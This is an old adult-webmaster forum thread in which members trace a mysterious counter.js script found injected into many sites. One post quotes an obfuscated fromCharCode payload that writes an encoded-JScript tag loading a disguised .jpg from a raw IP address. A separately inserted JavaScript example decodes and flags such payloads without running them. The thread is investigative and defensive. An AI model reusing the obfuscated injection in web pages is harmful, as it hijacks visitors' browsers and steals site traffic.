GoFuckYourself.com - Adult Webmaster Forum

http://66.40.16.194/counter.js (https://gfy.com/showthread.php?t=100138)

FreeOnes 01-15-2003 08:57 AM

http://66.40.16.194/counter.js

Does this belong to Paycounter?

traceroute to 66.40.16.194 (66.40.16.194), 32 hops max, 38 byte packets
1 ge.m20.access.science.giga.belnet.net (193.190.198.3) 1.111 ms
2 oc48.m160.core.science.giga.belnet.net (193.191.1.65) 0.306 ms
3 g2-1.c12410.science.belnet.net (193.191.201.69) 0.248 ms
4 adm-b1-pos1-3.telia.net (213.248.72.1) 3.651 ms
5 adm-bb2-pos1-0-0.telia.net (213.248.72.141) 3.756 ms
6 ldn-bb2-pos1-1-0.telia.net (213.248.64.122) 11.419 ms
7 nyk-bb2-pos2-3-0.telia.net (213.248.65.38) 83.869 ms
8 nyk-bb1-pos1-0-0.telia.net (213.248.80.13) 83.539 ms
9 chi-bb1-pos0-1-0.telia.net (213.248.80.6) 103.238 ms
10 williams.telia.net (213.248.84.74) 103.420 ms
11 chcgil1wcx3-oc48.wcg.net (64.200.103.78) 149.232 ms
12 snfcca1wcx3-oc48.wcg.net (64.200.240.94) 149.201 ms
13 sntcca2lce1-oc48.wcg.net (64.200.210.178) 149.014 ms
14 sntcca2lce1-hostcentric-gige.wcg.net (64.200.150.34) 149.110 ms
15 GE6-0.FMT-2.hostcentric.com (66.40.24.109) 149.328 ms
16 VLAN3.FMT6509-1.hostcentric.com (66.40.24.106) 149.557 ms
17 main1.bastun.net (66.40.16.194) 149.585 ms

The Hun 01-15-2003 11:18 AM

On that page:

String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,106,115,99,114,105,112,116,46,101,110,99,111,100,101,32,115,114,99,61,104,116,116,112,58,47,47,50,48,53,46,49,51,52,46,49,56,50,46,49,53,49,47,97,100,115,50,47,104,115,116,103,47,109,99,104,100,47,97,51,46,106,112,103,62,60,47,115,99,114,105,112,116,62,39,41,59));


Which evaluates to the following string:

document.write( '<script language=jscript.encode src=http://205.134.182.151/ads2/hstg/mchd/a3.jpg></script>' );

This loads http://205.134.182.151/ads2/hstg/mchd/a3.jpg as the source for a javascript. Most likely a program to add bookmarks or change people's homepage. This resolves to an image though... It's definitely not something by Paycounter.
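
A payload like the one in the post above can be decoded without running it. The following is an added example, not part of the original thread: it treats `String.fromCharCode(...)` calls as data, decodes them, and lists the script includes the decoded text would write, with the reasons each one looks suspicious. The function names `decodeCharCodes` and `scriptIncludes` are illustrative, and `SAMPLE` is the thread's payload with spaces inside some numbers, as line-wrapping forum software inserts them.

```javascript
// Sample input: the char-code payload quoted in this thread, with wrap-induced
// spaces inside some numbers ("11 2" stands for 112).
const SAMPLE = 'String.fromCharCode(' +
  '100,111,99,117,109,101,110,116 ,46,119,114,105,116,101,40,39,60,115,99,' +
  '114,105,11 2,116,32,108,97,110,103,117,97,103,101,61,106,115, 99,114,105,' +
  '112,116,46,101,110,99,111,100,101,32,11 5,114,99,61,104,116,116,112,58,' +
  '47,47,50,48,53,46,4 9,51,52,46,49,56,50,46,49,53,49,47,97,100,115,50,' +
  '4 7,104,115,116,103,47,109,99,104,100,47,97,51,46,10 6,112,103,62,60,47,' +
  '115,99,114,105,112,116,62,39,41 ,59));';

// Decode every String.fromCharCode(...) call in `source` without eval().
// Whitespace in the number list is removed first to undo wrapping damage.
function decodeCharCodes(source) {
  const out = [];
  for (const m of source.matchAll(/String\.fromCharCode\(([\d\s,]+)\)/g)) {
    const codes = m[1].replace(/\s+/g, '').split(',').filter(Boolean).map(Number);
    // Skip anything that is not a plausible list of UTF-16 code units.
    if (codes.some((c) => !Number.isInteger(c) || c > 0xffff)) continue;
    out.push(String.fromCharCode(...codes));
  }
  return out;
}

// List <script src=...> references in decoded text and flag the traits seen
// in this thread. The text is only pattern-matched; nothing is executed.
function scriptIncludes(decoded) {
  const found = [];
  for (const m of decoded.matchAll(/<script\b([^>]*)>/gi)) {
    const src = /\bsrc\s*=\s*["']?([^\s"'>]+)/i.exec(m[1]);
    if (!src) continue;
    let host = '', path = src[1];
    try { ({ hostname: host, pathname: path } = new URL(src[1])); } catch { /* relative URL */ }
    const flags = [];
    if (/^\d{1,3}(\.\d{1,3}){3}$/.test(host)) flags.push('ip-literal-host');
    if (/\.(jpe?g|gif|png)$/i.test(path)) flags.push('image-extension-as-script');
    if (/jscript\.encode/i.test(m[1])) flags.push('encoded-jscript');
    found.push({ src: src[1], flags });
  }
  return found;
}

// Report what the sample would have written into the page.
console.log(decodeCharCodes(SAMPLE).flatMap(scriptIncludes));
```
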

Va2k 01-15-2003 11:35 AM

Tam from rudebitch.com had that. I found it for her, and someone went in and put that into her webpages. If you have it in your index.html etc., get rid of it. It will steal your traffic.

TOM

FreeOnes 01-15-2003 12:15 PM

What is so strange about it is that it only loads an image file. The file http://66.40.16.194/counter.js shows up on a lot of pages. When it's loading, most virus scanners report that the JS/Seeker.gen.h virus has been found. On all the pages where I find the counter.js file, there is also a Paycounter installed, as far as I can remember. To me it looks like they have something to do with each other. Check for example this page:

http://devinn.miraclecreations.com/dl.htm

ip-address of paycounter.com = 66.77.141.20

FreeOnes 01-15-2003 12:18 PM

Quote:

Originally posted by va2k
Tam from rudebitch.com had that. I found it for her, and someone went in and put that into her webpages. If you have it in your index.html etc., get rid of it. It will steal your traffic.

TOM

This is interesting. How the heck did it get into her source code? As I said before, this code can be found in a lot of web pages!

KC 01-15-2003 12:18 PM

ds
Quote:

Originally posted by freeones
http://66.40.16.194/counter.js

Does this belong to Paycounter?

Absolutely not. I don't know what that is, but it has nothing to do with us. The only thing we install is code that pulls the counter image from count.paycounter.com.

Do a traceroute to count.paycounter.com and you'll see the traceroutes look nothing alike.

We don't automatically install anything. The only code that goes on our users pages is the code that they copy and paste directly.

-KC

FreeOnes 01-15-2003 12:23 PM

ok KC thanks for your reply!

FreeOnes 01-15-2003 12:25 PM

Anyhow, I have found some really interesting stuff.
Check this directory: http://205.134.182.151/ads_xx/
In the file local there is a bunch of code, including many domain names which ALL have the code http://66.40.16.194/counter.js installed !!!!!

Including miraclecreations.com. Very nice, I can now add them all to my blacklist.

I'm checking out the rest of this shit and which company it is running

FuqALot 01-15-2003 12:29 PM

Quote:

Originally posted by freeones
What is so strange about it is that it only loads an image file.

Well... I've seen people creating .jpg's, and if you load them, by just loading them with Internet Explorer like a normal picture, they'll install a virus on your computer allowing virus clients to log in, but they will also just show a picture. No joking... if you don't have the right patches installed, .jpg's can really harm your puter.

KC 01-15-2003 12:32 PM

that eval javascript string..

converts to this:

PHP Code:

document.write('<script language=jscript.encode src=http://205.134.182.151/ads2/hstg/mchd/a3.jpg></script>'); 



Here's a trace from one of our servers to his. He's on the East Coast someplace.

traceroute to 205.134.182.151 (205.134.182.151), 64 hops max, 40 byte packets
1 norcal.oc192.2.xfrnetworks.com (63.146.168.2) 0.363 ms 0.390 ms 0.272 ms
2 cntr-02.jsv.qwest.net (66.77.106.137) 0.282 ms 0.294 ms 0.204 ms
3 svl-core-03.inet.qwest.net (205.171.14.5) 0.366 ms 0.485 ms 0.382 ms
4 pax-brdr-02.inet.qwest.net (205.171.205.30) 1.019 ms 0.921 ms 0.822 ms
5 snfccapaix-qwest-pos.wcg.net (64.200.199.125) 1.090 ms 0.913 ms 0.915 ms
6 sntcca2lce1-oc48.wcg.net (64.200.210.177) 71.461 ms 71.699 ms 71.667 ms
7 snfcca1wcx2-oc48.wcg.net (64.200.199.73) 71.468 ms 71.308 ms 71.377 ms
8 anhmca1wcx3-oc48.wcg.net (64.200.240.1) 140.419 ms 142.986 ms 199.567 ms
9 hrndva1wcx2-oc48.wcg.net (64.200.240.30) 71.357 ms 71.346 ms 71.416 ms
10 hrndva1wcx3-pos9-0.wcg.net (64.200.95.134) 71.434 ms 71.452 ms 71.288 ms
11 washdc7lce1-oc48.wcg.net (64.200.95.94) 71.167 ms 71.096 ms 71.075 ms
12 washdc7lce1-yipes-gige.wcg.net (64.200.94.230) 71.303 ms 71.331 ms 71.493 ms
13 63.210.28.201 (63.210.28.201) 74.156 ms 72.118 ms 72.215 ms
14 63.210.28.199 (63.210.28.199) 72.413 ms 72.434 ms 72.240 ms
15 63.210.28.198 (63.210.28.198) 72.759 ms 73.321 ms 72.943 ms
16 east0.cluster.oc48.ai.net (205.134.160.25) 74.052 ms 75.916 ms 74.537 ms
17 205.134.182.151 (205.134.182.151) 74.808 ms 74.759 ms 74.856 ms

KC 01-15-2003 12:37 PM

I'm curious about how the hell they got installed on so many pages without the webmasters knowing.

If you've found one on your page, what editor do you use? Frontpage or something? Maybe a Frontpage virus that proliferates a much bigger virus?

FreeOnes 01-15-2003 12:40 PM

Quote:

Originally posted by KC
I'm curious about how the hell they got installed on so many pages without the webmasters knowing.

If you've found one on your page, what editor do you use? Frontpage or something? Maybe a Frontpage virus that proliferates a much bigger virus?

Do you mean on MY site ????
I hope not, and I can't find it.

KC 01-15-2003 12:42 PM

Quote:

Originally posted by freeones


Do you mean on MY site ????
I hope not, and I can't find it.


How is this guy getting them installed on so many pages?

FreeOnes 01-15-2003 12:44 PM

Found a link in my database hosted on one of the other domain names, and it contains the counter.js file:
http://pornstar.sexcreation.com/ashlyngere.html
It's clear to me that you can blacklist all these domain names. I'm not sure yet what the script exactly does, but your visitors won't like being redirected to a page with a virus warning.

funkmaster 01-15-2003 01:03 PM

... pretty interesting shit, but I just can't find out what that script does ...

playa 01-15-2003 01:07 PM

Has anyone read the source code?

